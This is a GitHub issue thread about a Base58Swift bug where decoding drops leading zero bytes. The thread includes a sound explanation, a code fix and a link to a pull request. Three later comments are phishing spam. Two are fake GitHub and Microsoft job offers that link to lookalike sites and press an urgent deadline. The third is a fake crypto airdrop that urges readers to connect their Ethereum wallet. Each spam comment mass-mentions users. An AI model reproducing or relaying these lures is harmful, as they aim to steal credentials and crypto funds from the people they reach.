### ISSUE TITLE
Decoding fails if the data's first byte is 0

### ISSUE THREAD

**Issue by nazariyg** [keefertaylor/Base58Swift#23]
Example:

```swift
let bytes: [UInt8] = [0, 128, 128, 128]
let encodedString = Base58.base58CheckEncode(bytes)
let decodedBytes = Base58.base58CheckDecode(encodedString)!  // <- fails here
```

**Comment by asloup** [comment]
Yeah, I think the bug is in `base58Decode` because it's handling things as a big int, which considers **leading 0s as insignificant** - for example, 000123456 is the same as 123456.  But for our case, those leading 0s represent 0x00 bytes, thus they **are significant**.  So we just need to prefix them back to the decoded bytes before returning.

Bug 
```return Array(byteString.prefix { i in i == alphabet[0] }) + bytes```

Fix
```
let zeroBytesToAdd = byteString.prefix { i in i == alphabet[0] }.count
return [UInt8](repeating: 0, count: zeroBytesToAdd) + bytes
```

**Comment by asloup** [comment]
Just checked the PRs too.  Looks like this one would fix it:  https://github.com/keefertaylor/Base58Swift/pull/21

**Comment by D-inspiration** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
case7026, @cNoveron, @Fuuurma, @chrisijoyah, @gsaint12, @rockcitystore, @eldabbagh, @ZeroL, @kingsleylow, @vishallamba1988, @brizzbuzz, @KoenBal, @JayGalvan90, @GET-BIT937, @alicandestek, @nottrunner, @gmcln-rct, @denji, @cwali09, @guo-yu

**Comment by rookiecdn** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.
nasirouwagana, @hujinghaoabcd, @ken-matsui, @ITCSsDeveloper, @shubaoxiao, @fabiulous, @biniek, @anzhaozhong, @lenage, @priom, @dorucioclea, @Sllke, @DennisKofflard, @KernelPryanic, @thomaslindsay86, @draveness, @dibakarsutradhar, @aaguilerav, @vbneto, @paulran

**Comment by vaibhavnaik1234** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
chenxinhua2018, @maktubliu, @samirettali, @jojoe77777, @hoangx, @emansije, @sunysen, @lannocc, @holys, @ken-matsui, @Dairston, @ekusiadadus, @napoly, @draveness, @WebShardow, @alex-wilmer, @mikeyhodl, @marissalib, @niyuelin1990, @patmonardo
